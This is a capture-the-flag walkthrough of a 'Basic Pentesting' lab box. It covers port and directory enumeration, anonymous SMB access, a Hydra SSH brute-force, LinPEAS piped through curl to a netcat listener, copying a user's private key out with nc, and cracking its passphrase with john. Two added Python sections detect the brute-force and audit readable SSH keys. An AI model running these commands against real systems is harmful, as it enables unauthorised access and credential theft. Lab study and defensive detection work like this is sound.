🐥Basic Pentesting

Reference(s):

Enumeration

Hosts/Ports

PORT     STATE SERVICE     REASON         VERSION
22/tcp   open  ssh         syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZXasCfWSXQ9lYiKbTNkPs0T+wFym2lZy229LllhY6iDLrjm7LIkhCcrlgnJQtLxl5NPhlHNVmwhlkcPPiAHwluhMVE5xKihQj3i+Ucx2IwiFvfmCz4AKsWlR6N8IZe55Ltw0lcH9ykuKZddg81X85EVsNbMacJNjjyxAtwQmJt1F5kB1B2ixgjLLOyNWafC5g1h6XbEgB2wiSRJ5UA8rOZaF28YcDVo0MQhsKpQG/5oPmQUsIeJTUA/XkoWCjvXZqHwv8XInQLQu3VXKgv735G+CJaKzplh7FZyXju8ViDSAY8gdhqpJommYxzqu9s1M31cmFg2fT5V1z9s4DP/vd
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBP0SXJpgwPf/e9AT9ri/dlAnkob4PqzMjl2Q9lZIVIXeEFJ9sfRkC+tgSjk9PwK0DUO3JU27pmtAkDL4Mtv9eZw=
|   256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAzy8ZacWXbPGeqtuiJCnPP0LYZYZlMj5D1ZY9ldg1wU
80/tcp   open  http        syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack ttl 61 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13       syn-ack ttl 61 Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http        syn-ack ttl 61 Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/9.0.7

Uptime guess: 0.007 days (since Fri Feb  3 11:41:53 2023)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m13s, median: 0s
| nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   BASIC2<00>           Flags: <unique><active>
|   BASIC2<03>           Flags: <unique><active>
|   BASIC2<20>           Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 44546/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 27338/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 38329/udp): CLEAN (Failed to receive data)
|   Check 4 (port 12209/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: basic2
|   NetBIOS computer name: BASIC2\x00
|   Domain name: \x00
|   FQDN: basic2
|_  System time: 2023-02-03T06:51:12-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-02-03T11:51:12
|_  start_date: N/A

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   263.67 ms 10.2.0.1
2   ... 3
4   391.88 ms basicpentest.thm

Services

22 SSH
80 HTTP
139 SMB
445 SMB

Port 8080 does not return anything when we go to the URL. Port 80 shows a website under maintenance:

There's a directory that's housing some more information. We can use ffuf to enumerate the directories.

$ ffuf -w /usr/share/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://basicpentest.thm:80/FUZZ -r -c -v

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://basicpentest.thm:80/FUZZ
 :: Wordlist         : FUZZ: /usr/share/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : true
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

[Status: 200, Size: 1131, Words: 72, Lines: 18, Duration: 391ms]
| URL | http://basicpentest.thm:80/development
    * FUZZ: development

dev.txt

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

j.txt

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.

-K

Weak credentials are present; we will use this information later.

SMB Enumeration

We can enumerate SMB with smbclient, CrackMapExec, or enum4linux.

smbclient -L //basicpentest.thm/

	Sharename       Type      Comment
	---------       ----      -------
	Anonymous       Disk      
	IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available

smbclient //basicpentest.thm/Anonymous
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Apr 19 18:31:20 2018
  ..                                  D        0  Thu Apr 19 18:13:06 2018
  staff.txt                           N      173  Thu Apr 19 18:29:55 2018

		14318640 blocks of size 1024. 11094008 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> 

cat staff.txt 
# Announcement to staff:

# PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
# this is how mistakes happen. (This means you too, Jan!)

-Kay

The note gives us a username, Jan, which we can use to brute-force the SSH password and log in.

Exploitation

SSH Bruteforcing

Now that we have a username, we can use Hydra or Metasploit to brute-force the SSH login and get a foothold on the system:

hydra basicpentest.thm ssh -l jan -P /usr/share/wordlists/rockyou.txt -I
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-03 13:03:15
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://basicpentest.thm:22/
[STATUS] 143.00 tries/min, 143 tries in 00:01h, 14344256 to do in 1671:50h, 16 active
[STATUS] 112.33 tries/min, 337 tries in 00:03h, 14344062 to do in 2128:12h, 16 active
[STATUS] 105.29 tries/min, 737 tries in 00:07h, 14343662 to do in 2270:36h, 16 active
[22][ssh] host: basicpentest.thm   login: jan   password: ██████████

jan:██████████
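From the defender's side a run like the one above is loud: sixteen parallel connections from one source, each a failed password for the same account, and then a success from that same source. The script below is added here and is not from the original writeup; it scores sshd log lines per source address over a sliding window. The log lines it parses are constructed, and 10.2.0.5 / 10.2.0.9 are placeholder addresses.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Added example (not from the original writeup): spot the burst of failed SSH
# logins that a Hydra run leaves in sshd's auth.log entries, and note when the
# same source later logs in successfully.

FAILED = re.compile(r"^(\w{3}\s+\d+ [\d:]+) \S+ sshd\[\d+\]: Failed password for "
                    r"(?:invalid user )?(\S+) from (\S+) port")
ACCEPTED = re.compile(r"^\w{3}\s+\d+ [\d:]+ \S+ sshd\[\d+\]: Accepted \S+ for (\S+) from (\S+) port")

def detect_bruteforce(lines, threshold=10, window_s=60, year=2023):
    """Return {src: {"peak": n, "users": [...], "success": bool}} for sources with
    at least `threshold` failed logins inside any `window_s`-second window."""
    recent, users, peak = defaultdict(deque), defaultdict(set), defaultdict(int)
    success = set()
    for line in lines:
        m = FAILED.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
            user, src = m.group(2), m.group(3)
            q = recent[src]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:   # drop failures outside the window
                q.popleft()
            users[src].add(user)
            peak[src] = max(peak[src], len(q))
            continue
        m = ACCEPTED.match(line)
        if m and peak[m.group(2)] >= threshold:   # a login that follows a burst
            success.add(m.group(2))
    return {src: {"peak": n, "users": sorted(users[src]), "success": src in success}
            for src, n in peak.items() if n >= threshold}

def constructed_log():
    """Constructed sample: 16 failures for jan in 15s (Hydra's 16 parallel tasks),
    one stray failure from another host, then a successful login from the attacker."""
    lines = [f"Feb  3 13:03:{15 + i:02d} basic2 sshd[{1200 + i}]: Failed password for jan "
             f"from 10.2.0.5 port {40000 + i} ssh2" for i in range(16)]
    lines.append("Feb  3 13:03:40 basic2 sshd[1300]: Failed password for kay from 10.2.0.9 port 50000 ssh2")
    lines.append("Feb  3 13:03:45 basic2 sshd[1301]: Accepted password for jan from 10.2.0.5 port 40020 ssh2")
    return lines

if __name__ == "__main__":
    for src, info in detect_bruteforce(constructed_log()).items():
        print(f"{src}: {info['peak']} failures within {60}s, users={info['users']}, "
              f"later success={info['success']}")
```

The Hydra warning about parallel tasks is the flip side of this: MaxStartups on the server caps concurrent unauthenticated connections, which is why a rate-based rule keyed on source address catches this pattern early.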

Foothold

$ whoami
jan
jan@basic2:~$ pwd
/home/jan
jan@basic2:~$ cd /home
jan@basic2:/home$ ls
jan  kay

There's another user, kay, whom we also saw in the note from the SMB share.

Now that we have access to the machine, we can grab the user flag and then escalate our privileges to root. We can use LinPEAS to enumerate possible vectors:

Download linpeas.sh from its repository, then serve it with a Python web server on your machine:

# Attacker:
python3 -m http.server 8080
nc -lvnp 4444 | tee linpeas.log # Starts a listener then outputs the results to a file

# Victim:
curl $IP:8080/linpeas.sh | sh | nc $IP 4444
# Replace $IP with your IP Address

The LinPEAS output shows that Kay's SSH private key (id_rsa) is readable by our user, so we can use it to SSH in as kay :)

Privilege Escalation

Copy the SSH key to a file on the attacking machine, then run chmod 400 kay_rsa.

# Attacker:
nc -lvnp 4444 > kay_rsa
## This will output to a file

# Victim:
nc -w 2 $IP 4444 < id_rsa
# -----
chmod 400 kay_rsa 

ssh kay@basicpentest.thm -i kay_rsa 
Enter passphrase for key 'kay_rsa': 
kay@basicpentest.thm's password: 

That didn't work: the key is passphrase-protected, so let's crack the passphrase instead.

$ python3 /opt/john/run/ssh2john.py kay_rsa > hash.txt
$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
████████
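Two separate failures made this step possible: kay's private key was readable by another local user, and the passphrase guarding it fell to rockyou. The audit below is added here and is not part of the original writeup; it walks a home root, reports private keys whose mode grants group or other read, and says whether each key at least carries a passphrase (PEM header, or the ciphername field of the OpenSSH key format). The home layout and key files it builds are constructed fixtures.

```python
import base64, os, stat, struct, tempfile

# Added example (not from the original writeup): find SSH private keys that other
# local users can read and report whether each exposed key has a passphrase.

OPENSSH_MAGIC = b"openssh-key-v1\x00"

def key_is_encrypted(path):
    """None if not a private key, else True when passphrase-protected."""
    with open(path, "rb") as f:
        data = f.read()
    if b"PRIVATE KEY-----" not in data:
        return None
    if b"Proc-Type: 4,ENCRYPTED" in data:            # legacy PEM, encrypted
        return True
    if b"BEGIN OPENSSH PRIVATE KEY" not in data:
        return False                                  # legacy PEM, cleartext
    body = b"".join(l for l in data.splitlines() if not l.startswith(b"-----"))
    blob = base64.b64decode(body)
    if not blob.startswith(OPENSSH_MAGIC):
        return False
    off = len(OPENSSH_MAGIC)
    (n,) = struct.unpack(">I", blob[off:off + 4])    # length of the ciphername string
    return blob[off + 4:off + 4 + n] != b"none"

def audit_ssh_keys(home_root):
    """Return [(path, mode, encrypted)] for private keys readable by group or others."""
    findings = []
    for user in sorted(os.listdir(home_root)):
        ssh_dir = os.path.join(home_root, user, ".ssh")
        for name in sorted(os.listdir(ssh_dir)) if os.path.isdir(ssh_dir) else []:
            path = os.path.join(ssh_dir, name)
            enc = key_is_encrypted(path) if os.path.isfile(path) else None
            mode = stat.S_IMODE(os.stat(path).st_mode)
            if enc is not None and mode & (stat.S_IRGRP | stat.S_IROTH):
                findings.append((path, oct(mode), enc))
    return findings

def build_fixture():
    """Constructed /home look-alike: kay's encrypted key is 0644, jan's cleartext key 0600."""
    root = tempfile.mkdtemp()
    blob = OPENSSH_MAGIC + struct.pack(">I", 4) + b"none"   # minimal cleartext header
    openssh = (b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(blob)
               + b"\n-----END OPENSSH PRIVATE KEY-----\n")
    pem = b"-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n-----END RSA PRIVATE KEY-----\n"
    for user, content, mode in (("kay", pem, 0o644), ("jan", openssh, 0o600)):
        os.makedirs(os.path.join(root, user, ".ssh"))
        path = os.path.join(root, user, ".ssh", "id_rsa")
        with open(path, "wb") as f:
            f.write(content)
        os.chmod(path, mode)
    return root
```

Run `audit_ssh_keys("/home")` as root on a real host; on the fixture it reports only kay's key, as 0o644 with a passphrase, which is exactly the state that left cracking as the remaining step.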

ssh -i kay_rsa kay@basicpentest.thm
Enter passphrase for key 'kay_rsa': 
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$ cat pass.bak
████████████████████████████████████████████████
